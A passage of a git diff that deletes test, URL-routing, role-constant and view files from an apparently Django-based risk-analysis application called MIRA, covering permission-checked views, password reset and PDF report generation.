folder=folder) - assert asset1.name == "Asset" - assert asset2.name == "Asset" - assert asset1.type == Asset.Type.SUPPORT - assert asset2.type == Asset.Type.SUPPORT - assert asset1.folder == root_folder - assert asset2.folder == folder - -# Note: no validation can be done at model level for m2m fields. This is done at form level. \ No newline at end of file diff --git a/core/tests/test_views.py b/core/tests/test_views.py deleted file mode 100644 index f9aed80..0000000 --- a/core/tests/test_views.py +++ /dev/null @@ -1,72 +0,0 @@ -from django.http import HttpResponse, HttpResponseRedirect -from django.shortcuts import get_object_or_404, render -from django.test.client import RequestFactory -from django.contrib.auth.models import AnonymousUser - -from core.models import Analysis, RiskScenario, SecurityMeasure -from core.views import * -from core.models import Threat, Project -from library.utils import * -from iam.models import Folder -from django.utils.translation import gettext_lazy as _ - -import pytest - -list = {} -factory = RequestFactory() -request = factory.get('/core/overview') -requestAnonym = factory.get('/core/overview') - -@pytest.fixture -def matrix_fixture(): - Folder.objects.create( - name="Global", content_type=Folder.ContentType.ROOT, builtin=True) - import_library(get_library('Critical matrix 5x5')) - -@pytest.fixture -def test_setUp(db, matrix_fixture): - list["root_folder"] = Folder.objects.get(content_type=Folder.ContentType.ROOT) - list["folder"] = Folder.objects.create(name="Test Folder", content_type=Folder.ContentType.DOMAIN, parent_folder = list.get("root_folder")) - list["project"] = Project.objects.create(name="Test Project", folder = list.get("folder")) - list["analysis"] = Analysis.objects.create(project=list.get("project"), rating_matrix=RiskMatrix.objects.latest('created_at')) - list["threat"] = Threat.objects.create(name="Test Threat", folder = list.get("root_folder")) - list["riskscenario"] = RiskScenario.objects.create(analysis=list.get("analysis"), threat=list.get("threat"), current_proba=0, current_impact=1) - -@pytest.fixture -def create_user(db, django_user_model): - def make_user(**kwargs): - return django_user_model.objects.create_user(email='john.doe@example.com', password=None) - return make_user - -def test_create_user(db, create_user): - user = create_user() - request.user = user - -def test_create_anonymousUser(db): - requestAnonym.user = AnonymousUser() - -def test_build_ri_clusters(db, test_setUp): - matrix_current = [[set(), {'R.1'}, set(), set(), set()], [set(), set(), set(), set(), set()], - [set(), set(), set(), set(), set()], [set(), set(), set(), set(), set()], - [set(), set(), set(), set(), set()]] - matrix_residual = [[set(), set(), set(), set(), set()], [set(), set(), set(), set(), set()], - [set(), set(), set(), set(), set()], [set(), set(), set(), set(), set()], - [set(), set(), set(), set(), set()]] - assert build_ri_clusters(list.get("analysis")) == {'current': matrix_current, 'residual': matrix_residual} - -# def test_generate_ra_pdf(db, test_setUp): -# assert generate_ra_pdf(request, str(list["analysis"].id))['Content-Disposition'] == f'filename="RA-2-Test Project-v-0.1.pdf"' -# assert str(generate_ra_pdf(request, 2)) == str(HttpResponse(status=200, content_type='application/pdf')) # Not good to compare strings, to review ! - -# def test_generate_mp_pdf(db, test_setUp): -# assert generate_mp_pdf(request, 3)['Content-Disposition'] == f'filename="MP-3-Test Project-v-0.1.pdf"' -# assert str(generate_mp_pdf(request, 3)) == str(HttpResponse(status=200, content_type='application/pdf')) # Not good to compare strings, to review ! - -def test_global_overview(db, test_setUp): - assert str(global_overview(request)) == str(HttpResponse(status=200)) - -def test_generate_ra_pdf_login(db, test_setUp): - assert str(generate_ra_pdf(requestAnonym, 2)) == str(HttpResponseRedirect(status=302, redirect_to="/accounts/login/?next=/core/overview")) - -def test_generate_mp_pdf_login(db, test_setUp): - assert str(generate_mp_pdf(requestAnonym, 3)) == str(HttpResponseRedirect(status=302, redirect_to="/accounts/login/?next=/core/overview")) diff --git a/core/urls.py b/core/urls.py deleted file mode 100644 index 6f1f13f..0000000 --- a/core/urls.py +++ /dev/null @@ -1,142 +0,0 @@ -from django.urls import path -from django.urls.conf import include - -from . import views -import cal.views as cv -from django.contrib.auth.decorators import login_required -from django.contrib.auth import views as auth_views - -urlpatterns = [ - path('i18n/', include('django.conf.urls.i18n')), - path('search/', login_required(views.SearchResults.as_view()), name='search'), - - path('password_reset', views.password_reset_request, name='password_reset'), - path('password_reset/done/', auth_views.PasswordResetDoneView.as_view(template_name='registration/password_reset_done.html'), name='password_reset_done'), - path('reset///', views.ResetPasswordConfirmView.as_view(), name='password_reset_confirm'), - path('reset/done/', auth_views.PasswordResetCompleteView.as_view(template_name='registration/password_reset_complete.html'), name='password_reset_complete'), - path('first_connexion///', views.FirstConnexionPasswordConfirmView.as_view(), name='first_connexion_confirm'), - path('analyses-registry', login_required(views.AnalysisListView.as_view()), name='analysis_list'), - - path('analysis/.pdf', login_required(views.generate_ra_pdf), name='RA-PDF'), - path('analysis/.csv', login_required(views.export_risks_csv), name='RA-CSV'), - - path('analyses-registry/plan//', login_required(views.SecurityMeasurePlanView.as_view()), name='MP'), - path('treatment/.pdf', login_required(views.generate_mp_pdf), name='MP-PDF'), - path('treatment/.csv', login_required(views.export_mp_csv), name='MP-CSV'), - - path('overview/', login_required(views.global_overview), name='overview'), - path('calendar/', login_required(cv.CalendarView.as_view()), name='calendar'), - path('overview/composer/', login_required(views.ComposerListView.as_view()), name='composer'), - - path('scoring-assistant/', login_required(views.scoring_assistant), name='scoring'), - path('risk-matrix/', login_required(views.show_risk_matrix), name='riskmatrix'), # obsolete, to be removed - - path('license/', login_required(views.license_overview), name='lic-management'), - - path('browser/', login_required(views.Browser.as_view()), name='browser'), - path('quick-start', login_required(views.QuickStartView.as_view()), name='quick_start'), - path('scoring-assistant', login_required(views.scoring_assistant), name='scoring_bo'), - - # LIST VIEWS - path('risk-analyses/', login_required(views.RiskAnalysisListView.as_view()), name='analysis-list'), - path('risk-scenarios/', login_required(views.RiskScenarioListView.as_view()), name='riskscenario-list'), - path('security-measures/', login_required(views.SecurityMeasureListView.as_view()), name='securitymeasure-list'), - path('risk-acceptances/', login_required(views.RiskAcceptanceListView.as_view()), name='riskacceptance-list'), - - path('projects-domains/', login_required(views.FolderListView.as_view()), name='folder-list'), - path('projects/', login_required(views.ProjectListView.as_view()), name='project-list'), - path('assets/', login_required(views.AssetListView.as_view()), name='asset-list'), - path('threats/', login_required(views.ThreatListView.as_view()), name='threat-list'), - path('security-functions/', login_required(views.SecurityFunctionListView.as_view()), name='securityfunction-list'), - - path('users/', login_required(views.UserListView.as_view()), name='user-list'), - path('user_groups/', login_required(views.UserGroupListView.as_view()), name='usergroup-list'), - path('roles/', login_required(views.RoleAssignmentListView.as_view()), name='role-list'), - path('matrices/', login_required(views.RiskMatrixListView.as_view()), name='riskmatrix-list'), - path('profile', login_required(views.MyProfileDetailView.as_view()), name='user-detail'), - - # CREATE VIEWS - path('risk-analyses/create', login_required(views.RiskAnalysisCreateView.as_view()), name='analysis-create'), - path('risk-analyses/create-modal/', login_required(views.RiskAnalysisCreateView.as_view()), name='analysis-create-modal'), - - path('security-measures/create-modal/', login_required(views.SecurityMeasureCreateViewModal.as_view()), name='securitymeasure-create-modal'), - - path('risk_acceptances/create-modal/', login_required(views.RiskAcceptanceCreateViewModal.as_view()), name='riskacceptance-create-modal'), - - path('security-functions/create-modal/', login_required(views.SecurityFunctionCreateViewModal.as_view()), name='securityfunction-create-modal'), - - path('threats/create-modal/', login_required(views.ThreatCreateViewModal.as_view()), name='threat-create-modal'), - - path('risk-analyses//risk_scenario/create', login_required(views.RiskScenarioCreateView.as_view()), name='riskscenario-create'), - path('risk-scenarios/create', login_required(views.RiskScenarioCreateViewModal.as_view()), name='riskscenario-create-modal'), - - path('projects-domains/create', login_required(views.FolderCreateView.as_view()), name='folder-create'), - path('projects-domains/create_modal/', login_required(views.FolderCreateViewModal.as_view()), name='folder-create-modal'), - - path('projects/create', login_required(views.ProjectCreateView.as_view()), name='project-create'), - path('projects/create_modal/', login_required(views.ProjectCreateViewModal.as_view()), name='project-create-modal'), - - path('assets/create/', login_required(views.AssetCreateView.as_view()), name='asset-create'), - path('assets/create_modal/', login_required(views.AssetCreateViewModal.as_view()), name='asset-create-modal'), - - - path('users/create', login_required(views.UserCreateView.as_view()), name='user-create'), - path('user-groups/create', login_required(views.UserGroupCreateView.as_view()), name='usergroup-create'), - - path('role-assignments/create', login_required(views.RoleAssignmentCreateView.as_view()), name='roleassignment-create'), - - # path('risk_scenario/create-modal', login_required(views.RiskScenarioCreateViewModal.as_view()), name='riskscenario-create-modal'), - - # UPDATE VIEWS - path('risk-scenarios/update_modal', login_required(views.RiskScenarioUpdateViewModal.as_view()), name='riskscenario-update-modal'), - - path('matrices//edit/', login_required(views.RiskMatrixUpdateView.as_view()), name='riskmatrix-update'), - path('risk-analyses//edit/', login_required(views.RiskAnalysisUpdateView.as_view()), name='analysis-update'), - path('risk-scenarios//edit/', login_required(views.RiskScenarioUpdateView.as_view()), name='riskscenario-update'), - path('security-measures//edit/', login_required(views.SecurityMeasureUpdateView.as_view()), name='securitymeasure-update'), - path('risk-acceptances//edit/', login_required(views.RiskAcceptanceUpdateView.as_view()), name='riskacceptance-update'), - path('threats//edit/', login_required(views.ThreatUpdateView.as_view()), name='threat-update'), - path('security-functions//edit/', login_required(views.SecurityFunctionUpdateView.as_view()), name='securityfunction-update'), - - path('projects-domains//edit/', login_required(views.FolderUpdateView.as_view()), name='folder-update'), - path('projects//edit/', login_required(views.ProjectUpdateView.as_view()), name='project-update'), - path('assets//edit/', login_required(views.AssetUpdateView.as_view()), name='asset-update'), - - path('users//edit/', login_required(views.UserUpdateView.as_view()), name='user-update'), - path('my-profile//edit/', login_required(views.MyProfileUpdateView.as_view()), name='me-update'), - path('users//password', login_required(views.UserPasswordChangeView.as_view()), name='password-change'), - path('user-groups//edit/', login_required(views.UserGroupUpdateView.as_view()), name='usergroup-update'), - path('role-assignments//edit/', login_required(views.RoleAssignmentUpdateView.as_view()), name='roleassignment-update'), - - # DELETE VIEWS - path('matrices//delete/', login_required(views.RiskMatrixDeleteView.as_view()), name='riskmatrix-delete'), - path('risk-analyses//delete/', login_required(views.RiskAnalysisDeleteView.as_view()), name='analysis-delete'), - path('risk-scenarios//delete/', login_required(views.RiskScenarioDeleteView.as_view()), name='riskscenario-delete'), - path('risk-acceptances//delete/', login_required(views.RiskAcceptanceDeleteView.as_view()), name='riskacceptance-delete'), - path('security-measures//delete/', login_required(views.SecurityMeasureDeleteView.as_view()), name='securitymeasure-delete'), - path('projects//delete/', login_required(views.ProjectDeleteView.as_view()), name='project-delete'), - path('assets//delete/', login_required(views.AssetDeleteView.as_view()), name='asset-delete'), - path('security-functions//delete/', login_required(views.SecurityFunctionDeleteView.as_view()), name='securityfunction-delete'), - path('projects-domains//delete/', login_required(views.FolderDeleteView.as_view()), name='folder-delete'), - path('threats//delete/', login_required(views.ThreatDeleteView.as_view()), name='threat-delete'), - - path('users//delete', login_required(views.UserDeleteView.as_view()), name='user-delete'), - path('user-groups//delete', login_required(views.UserGroupDeleteView.as_view()), name='usergroup-delete'), - - path('role-assignments//delete', login_required(views.RoleAssignmentDeleteView.as_view()), name='role-assignment-delete'), - - # DETAIL VIEWS - path('matrices/', login_required(views.RiskMatrixDetailView.as_view()), name='riskmatrix-detail'), - path('risk-scenarios/', login_required(views.RiskScenarioDetailView.as_view()), name='riskscenario-detail'), - path('security-measures/', login_required(views.SecurityMeasureDetailView.as_view()), name='securitymeasure-detail'), - path('risk-acceptances/', login_required(views.RiskAcceptanceDetailView.as_view()), name='riskacceptance-detail'), - path('projects-domains/', login_required(views.FolderDetailView.as_view()), name='folder-detail'), - path('projects/', login_required(views.ProjectDetailView.as_view()), name='project-detail'), - path('assets/', login_required(views.AssetDetailView.as_view()), name='asset-detail'), - path('threats/', login_required(views.ThreatDetailView.as_view()), name='threat-detail'), - path('security-functions/', login_required(views.SecurityFunctionDetailView.as_view()), name='securityfunction-detail'), - - path('users/', login_required(views.UserDetailView.as_view()), name='user-detail'), - - path('risk-analyses//', login_required(views.RiskAnalysisView.as_view()), name='RA'), -] \ No newline at end of file diff --git a/core/utils.py b/core/utils.py deleted file mode 100644 index 8b1a2d7..0000000 --- a/core/utils.py +++ /dev/null @@ -1,52 +0,0 @@ -from django.utils.translation import gettext_lazy as _ -from enum import Enum - -class RoleCodename(Enum): - ADMINISTRATOR = 'BI-RL-ADM' - DOMAIN_MANAGER = 'BI-RL-DMA' - ANALYST = 'BI-RL-ANA' - VALIDATOR = 'BI-RL-VAL' - AUDITOR = 'BI-RL-AUD' - - def __str__(self) -> str: - return self.value - -class UserGroupCodename(Enum): - ADMINISTRATOR = 'BI-UG-ADM' - GLOBAL_AUDITOR = 'BI-UG-GAD' - GLOBAL_VALIDATOR = 'BI-UG-GVA' - DOMAIN_MANAGER = 'BI-UG-DMA' - ANALYST = 'BI-UG-ANA' - VALIDATOR = 'BI-UG-VAL' - AUDITOR = 'BI-UG-AUD' - - def __str__(self) -> str: - return self.value - -BUILTIN_ROLE_CODENAMES = { - str(RoleCodename.ADMINISTRATOR): _('Administrator'), - str(RoleCodename.DOMAIN_MANAGER): _('Domain manager'), - str(RoleCodename.ANALYST): _('Analyst'), - str(RoleCodename.VALIDATOR): _('Validator'), - str(RoleCodename.AUDITOR): _('Auditor'), -} - -BUILTIN_USERGROUP_CODENAMES = { - str(UserGroupCodename.ADMINISTRATOR): _('Administrator'), - str(UserGroupCodename.GLOBAL_AUDITOR): _('Auditor'), - str(UserGroupCodename.GLOBAL_VALIDATOR): _('Validator'), - str(UserGroupCodename.DOMAIN_MANAGER): _('Domain manager'), - str(UserGroupCodename.ANALYST): _('Analyst'), - str(UserGroupCodename.VALIDATOR): _('Validator'), - str(UserGroupCodename.AUDITOR): _('Auditor'), -} - -COUNTRY_FLAGS = { - 'fr': '🇫🇷', - 'en': '🇬🇧', -} - -LANGUAGES = { - 'fr': _('French'), - 'en': _('English'), -} \ No newline at end of file diff --git a/core/views.py b/core/views.py deleted file mode 100644 index 89001ae..0000000 --- a/core/views.py +++ /dev/null @@ -1,2241 +0,0 @@ -from uuid import UUID -from django.shortcuts import render, redirect -from django.http import HttpResponse -from django.contrib.auth.decorators import login_required -from django.shortcuts import get_object_or_404, render -from django.utils.decorators import method_decorator -from django.contrib.auth.mixins import UserPassesTestMixin -from django.contrib.auth.models import Permission -from django.core.exceptions import PermissionDenied - -from django.http import HttpResponse, JsonResponse -from django.contrib.auth.forms import PasswordResetForm -from django.contrib.auth.views import PasswordResetConfirmView -from django.contrib.auth.models import User -from django.template.loader import render_to_string -from django.db.models.query_utils import Q -from django.utils.http import urlsafe_base64_encode -from django.contrib.auth.tokens import default_token_generator -from django.utils.encoding import force_bytes - -from core.models import Analysis, RiskScenario, SecurityMeasure, RiskMatrix -from core.models import Project -from iam.models import Folder, RoleAssignment, User - -from django.contrib.auth.views import LoginView -from django.core.paginator import Paginator -from .forms import LoginForm - -from django.db.models import Q - -from django.utils.translation import gettext_lazy as _ - -from .helpers import * - -from django.template.loader import render_to_string -from weasyprint import HTML, CSS -import logging -import csv -import time, random - -from typing import Optional, Any -from django.urls import reverse, reverse_lazy -from django.views.generic import ListView, UpdateView, CreateView, DeleteView, DetailView -from django.http import HttpResponse -from django.forms.models import model_to_dict -from django.template import loader -from django.utils.translation import gettext_lazy as _ -from django.utils.html import format_html -from datetime import date -from django.contrib import messages -from core.utils import RoleCodename, UserGroupCodename -from iam.models import UserGroup, Role, RoleAssignment -from django.contrib.auth.views import PasswordChangeView -from django.views.generic.edit import FormView -from core.models import Analysis, RiskScenario, SecurityMeasure, RiskAcceptance -from iam.forms import * -from core.forms import * -from .filters import * - -from core.helpers import get_counters, risks_count_per_level, security_measure_per_status, measures_to_review, acceptances_to_review -from django.contrib.auth import get_user_model - -from django.contrib.auth.signals import user_logged_in -from django.dispatch import receiver - -from mira.settings import RECAPTCHA_PUBLIC_KEY, LICENCE_DEPLOYMENT, LICENCE_EXPIRATION, LICENCE_SUPPORT, LICENCE_TYPE, PAGINATE_BY -if RECAPTCHA_PUBLIC_KEY: - from captcha.fields import ReCaptchaField - -from datetime import datetime, timedelta -import re - -import json - -User = get_user_model() - -MAX_USERS = 20 - -def is_ajax(request): - """ - Method to know if it's an ajax request or not - """ - return request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest' - - -def get_pagination_url(request): - url = request.path - - # Append the current GET parameters to the base URL - get_params = request.GET.copy() - if 'page' in get_params: - del get_params['page'] - if get_params: - return url + '?' + get_params.urlencode() + '&page=' - else: - return url + '?page=' - -class BaseContextMixin: - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['change_usergroup'] = RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_usergroup"), folder=Folder.get_root_folder()) - context['view_user'] = RoleAssignment.has_permission( - self.request.user, "view_user") - context['exceeded_users'] = (MAX_USERS - User.objects.all().count()) < 0 - - # Set the pagination URL in the context - context['pagination_url'] = get_pagination_url(self.request) - - return context - - -class GenericDetailView(BaseContextMixin, DetailView): - template_name = 'generic/detail.html' - context_object_name = 'object' - - exclude = ['id', 'is_published'] - - field_order = [] - - def get_object_data(self): - object_data = model_to_dict(self.object) - - # sort fields according to field_order - # put first fields in field_order, then the rest - if self.field_order: - object_data = { - k: object_data[k] for k in self.field_order if k in object_data} | object_data - - for key in list(object_data.keys()): - if key in self.exclude: - object_data.pop(key) - continue - # replace uuids with their respective objects - if object_data[key] and isinstance(object_data[key], UUID): - object_data[key] = getattr(self.object, key) - # get proper value display for choice fields - if choices := self.get_object()._meta.get_field(key).choices: - if key in object_data and object_data[key] in dict(choices): - object_data[key] = dict(choices)[object_data[key]] - # convert all fields to iterables for template rendering - if not isinstance(object_data[key], list): - object_data[key] = [object_data[key]] - # replace field names with their respective verbose names - object_data[self.object._meta.get_field( - key).verbose_name] = object_data.pop(key) - - return object_data - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, self.model) - context['change'] = self.object.id in object_ids_change - context['delete'] = self.object.id in object_ids_delete - if self.model is User: - # NOTE: using has_permission() because get_accessible_objects() doesn't handle this object_type moreover there isn't scope - context['change'] = RoleAssignment.has_permission(self.request.user, 'change_user') - context['delete'] = RoleAssignment.has_permission(self.request.user, 'delete_user') - context['data'] = self.get_object_data() - context['crumbs'] = {self.model.__name__.lower() + "-list": self.model._meta.verbose_name_plural.capitalize()} - - return context - - -class RiskScenarioDetailView(GenericDetailView): - model = RiskScenario - exclude = ['id', 'current_proba', 'residual_proba', 'current_impact', - 'residual_impact', 'current_level', 'residual_level'] - - def get_object_data(self): - object_data = super().get_object_data() - - _data = {} - - _data['current_proba'] = self.object.get_current_proba()['name'] - _data['residual_proba'] = self.object.get_residual_proba()['name'] - _data['current_impact'] = self.object.get_current_impact()['name'] - _data['residual_impact'] = self.object.get_residual_impact()['name'] - _data['current_level'] = self.object.get_current_risk()['name'] - _data['residual_level'] = self.object.get_residual_risk()['name'] - - for key in list(_data.keys()): - object_data[self.object._meta.get_field( - key).verbose_name] = [_data.pop(key)] - - return object_data - - -class SecurityMeasureDetailView(GenericDetailView): - model = SecurityMeasure - - -class RiskAcceptanceDetailView(GenericDetailView): - model = RiskAcceptance - template_name = "core/detail/riskacceptance_detail.html" - exclude = [''] - - def setup(self, request, *args, **kwargs): - super().setup(request, *args, **kwargs) - self.object = get_object_or_404(RiskAcceptance, id=self.kwargs['pk']) - if self.object.state in ('created', 'submitted'): - self.exclude = ['accepted_date', 'revoked_date', 'rejected_date'] - elif self.object.state == 'accepted': - self.exclude = ['revoked_date', 'rejected_date'] - elif self.object.state == 'rejected': - self.exclude = ['accepted_date', 'revoked_date'] - elif self.object.state == 'revoked': - self.exclude = ['rejected_date'] - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - self.object = get_object_or_404(RiskAcceptance, id=self.kwargs['pk']) - if self.object.state == 'submitted': - context['risk_acceptance_need_validation'] = ( - self.request.user == self.object.validator) - if self.object.state == 'accepted': - context['risk_acceptance_accepted'] = True - if self.object.state == 'rejected': - context['risk_acceptance_rejected'] = True - if self.object.state == 'revoked': - context['risk_acceptance_revoked'] = True - context['validate_riskacceptance'] = RoleAssignment.is_access_allowed(user=self.request.user, - perm=Permission.objects.get(codename='validate_riskacceptance'), - folder=self.object.folder) - return context - - def post(self, request, *args, **kwargs): - self.object = get_object_or_404(RiskAcceptance, id=self.kwargs['pk']) - if RoleAssignment.is_access_allowed(user=self.request.user, - perm=Permission.objects.get(codename='validate_riskacceptance'), - folder=self.object.folder): - if 'accepted' in request.POST: - self.object.set_state('accepted') - messages.success(request, _("Risk acceptance: {} accepted with success!".format(self.object.name))) - elif 'rejected' in request.POST: - self.object.set_state('rejected') - messages.success(request, _("Risk acceptance: {} rejected with success!".format(self.object.name))) - elif 'revoked' in request.POST: - self.object.set_state('revoked') - messages.success(request, _("Risk acceptance: {} revoked with success!".format(self.object.name))) - else: - messages.error(request, "An internal error has occured.") - else: - messages.error(request, "Permission denied: you are not allowed to validate this risk acceptance.") - return redirect("riskacceptance-detail", self.object.id) - - -class FolderDetailView(GenericDetailView): - model = Folder - exclude = ['id', 'content_type', 'builtin', "hide_public_asset", - "hide_public_matrix", "hide_public_threat", "hide_public_security_function", "parent_folder"] - - template_name = "core/detail/folder_detail.html" - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context["crumbs"] = {"folder-list": _("Projects domains")} - context['projects'] = Project.objects.filter(folder=self.object) - context['project_create_form'] = ProjectFormInherited( - initial={'folder': self.object}) - return context - - -class ProjectDetailView(GenericDetailView): - model = Project - - template_name = "core/detail/project_detail.html" - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context["crumbs"] = {"project-list": _("Projects")} - context['analysis_create_form'] = RiskAnalysisCreateFormInherited( - initial={'project': self.object}) - context['analyses'] = Analysis.objects.filter(project=self.object) - context['no_matrix'] = (RiskMatrix.objects.all().count() - RiskMatrix.objects.filter(is_enabled=False).count()) < 1 - return context - - -class AssetDetailView(GenericDetailView): - model = Asset - exclude = ['id', 'is_published', 'folder'] - - -class ThreatDetailView(GenericDetailView): - model = Threat - exclude = ['id', 'is_published', 'folder'] - - -class SecurityFunctionDetailView(GenericDetailView): - model = SecurityFunction - exclude = ['id', 'is_published', 'folder'] - - -class UserDetailView(UserPassesTestMixin, GenericDetailView): - model = User - exclude = ['id', 'password', 'first_login'] - - def test_func(self): - return RoleAssignment.has_permission(user=self.request.user, codename="view_user") or self.request.user == self.get_object() - - - -class AnalysisListView(BaseContextMixin, ListView): - template_name = 'core/index.html' - context_object_name = 'context' - - ordering = 'id' - paginate_by = PAGINATE_BY - model = Analysis - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - if self.request.user.first_login: - messages.info(self.request, format_html(_( - "Welcome to MIRA! 👋
    Question or feedback? click here"))) - self.request.user.first_login = False - self.request.user.save() - if not UserGroup.get_user_groups(self.request.user): - messages.warning(self.request, _( - "Warning! You are not assigned to any group. Without a group you will not have access to any functionality. Please contact your administrator.")) - return context - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Analysis) - qs = self.model.objects.filter( - id__in=object_ids_view).order_by(self.ordering) - return qs - - -class UserLogin(LoginView): - template_name = 'registration/login.html' - form_class = LoginForm - - def form_valid(self, form): - user = form.get_user() - nb_pending_acceptances = RiskAcceptance.objects.filter(validator=user, state='submitted').count() - if nb_pending_acceptances > 0: - messages.info(self.request, format_html(_("You have {} pending risk acceptance(s) waiting to be processed. Go to the list of risk acceptances to learn more."), nb_pending_acceptances, reverse('riskacceptance-list'))) - return super().form_valid(form) - - -def password_reset_request(request): - context = {} - if request.method == "POST": - now = datetime.now() - password_reset_form = ResetForm(request.POST) - if password_reset_form.is_valid(): - data = password_reset_form.cleaned_data['email'] - associated_users = User.objects.filter(email=data) - if associated_users and associated_users.exists(): - associated_user = associated_users[0] - try: - if 'last_email_sent' in request.session: - last_sent_time = datetime.strptime( - request.session['last_email_sent'], '%Y-%m-%d %H:%M:%S') - elapsed_time = now - last_sent_time - # Vérifier si 30 secondes se sont écoulées depuis le dernier envoi de mail - if elapsed_time < timedelta(seconds=30): - # Si oui, retourner une réponse d'erreur - messages.error( - request, _("Please wait before requesting another password reset.")) - context["password_reset_form"] = password_reset_form - return render(request=request, template_name="registration/password_reset.html", context=context) - # Si tout est OK, envoyer l'email et enregistrer la date et l'heure actuelle dans la session - print("Sending reset mail to", data) - associated_user.mailing(email_template_name="registration/password_reset_email.html", subject=_("Mira: Password Reset")) - request.session['last_email_sent'] = now.strftime('%Y-%m-%d %H:%M:%S') - except Exception as exception: - messages.error( - request, _('An error has occured, please try later.')) - print("Exception:", exception) - password_reset_form = ResetForm() - context["password_reset_form"] = password_reset_form - return render(request=request, template_name="registration/password_reset.html", context=context) - else: - # wrong, but we won't tell the requester for security reasons - time.sleep(random.random()*1.5) - print("wrong email reset:", data) - return redirect("/password_reset/done/") - else: - messages.error(request, _("Invalid email or captcha.")) - password_reset_form = ResetForm() - context["password_reset_form"] = password_reset_form - return render(request=request, template_name="registration/password_reset.html", context=context) - - -class ResetPasswordConfirmView(PasswordResetConfirmView): - template_name = "registration/password_reset_confirm.html" - form_class = ResetConfirmForm - - -class FirstConnexionPasswordConfirmView(PasswordResetConfirmView): - template_name = "registration/first_connexion_confirm.html" - form_class = FirstConnexionConfirmForm - - -class SecurityMeasurePlanView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/mp.html' - context_object_name = 'context' - - ordering = 'created_at' - model = RiskScenario - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, RiskScenario) - qs = self.model.objects.filter(analysis=self.kwargs['analysis']).filter( - id__in=object_ids_view).order_by(self.ordering) - return qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['analysis'] = get_object_or_404(Analysis, pk=self.kwargs['analysis']) - context['crumbs'] = {'analysis_list': _('Analysis registry')} - return context - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -def build_ri_clusters(analysis: Analysis): - matrix = analysis.rating_matrix.parse_json() - grid = matrix['grid'] - matrix_current = [[set() for _ in range(len(grid[0]))] - for _ in range(len(grid))] - matrix_residual = [[set() for _ in range(len(grid[0]))] - for _ in range(len(grid))] - - for ri in RiskScenario.objects.filter(analysis=analysis).order_by('created_at'): - if ri.current_level >= 0: - matrix_current[ri.current_proba][ri.current_impact].add(ri.rid) - if ri.residual_level >= 0: - matrix_residual[ri.residual_proba][ri.residual_impact].add(ri.rid) - - return {'current': matrix_current, 'residual': matrix_residual} - - -class RiskAnalysisView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/ra.html' - context_object_name = 'context' - - model = RiskScenario - ordering = 'created_at' - - def get_queryset(self): - self.analysis = get_object_or_404(Analysis, id=self.kwargs['analysis']) - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, RiskScenario) - qs = self.model.objects.filter(id__in=object_ids_view).filter( - analysis=self.analysis).order_by(self.ordering) - return qs - - def get_context_data(self, **kwargs): - # Call the base implementation first to get a context - context = super().get_context_data(**kwargs) - # then Add in - context['analysis'] = self.analysis - context['ri_clusters'] = build_ri_clusters(self.analysis) - context['scenarios'] = RiskScenario.objects.filter( - analysis=self.analysis).order_by('created_at') - context['matrix'] = self.analysis.rating_matrix - (context['object_ids_view'], context['object_ids_change'], context['object_ids_delete']) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Analysis) - context['crumbs'] = {'analysis-list': _('Risk analyses')} - return context - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="view_analysis"), folder=get_object_or_404(Analysis, id=self.kwargs['analysis']).project.folder) - - -@login_required -def generate_ra_pdf(request, analysis: Analysis): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), request.user, Analysis) - if UUID(analysis) in object_ids_view: - ra = get_object_or_404(Analysis, pk=analysis) - context = RiskScenario.objects.filter(analysis=analysis).order_by('created_at') - data = {'context': context, 'analysis': ra, - 'ri_clusters': build_ri_clusters(ra), 'matrix': ra.rating_matrix} - html = render_to_string('core/ra_pdf.html', data) - pdf_file = HTML(string=html).write_pdf() - response = HttpResponse(pdf_file, content_type='application/pdf') - response['Content-Disposition'] = f'filename="RA-{ra.id}-{ra.project}-v-{ra.version}.pdf"' - return response - else: - raise PermissionDenied() - -@login_required -def generate_mp_pdf(request, analysis): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), request.user, Analysis) - if UUID(analysis) in object_ids_view: - ra = get_object_or_404(Analysis, pk=analysis) - context = RiskScenario.objects.filter(analysis=analysis).order_by('created_at') - data = {'context': context, 'analysis': ra} - html = render_to_string('core/mp_pdf.html', data) - pdf_file = HTML(string=html).write_pdf() - response = HttpResponse(pdf_file, content_type='application/pdf') - response['Content-Disposition'] = f'filename="MP-{ra.id}-{ra.project}-v-{ra.version}.pdf"' - return response - else: - raise PermissionDenied() - - -class SearchResults(ListView): - context_object_name = 'results' - template_name = 'core/search_results.html' - - def get_queryset(self): - query = self.request.GET.get('q') - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, RiskScenario) - ri_list = RiskScenario.objects.filter(Q(name__icontains=query) | Q( - threat__name__icontains=query)).filter(id__in=object_ids_view)[:10] - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, SecurityMeasure) - mtg_list = SecurityMeasure.objects.filter(Q(name__icontains=query) | Q( - 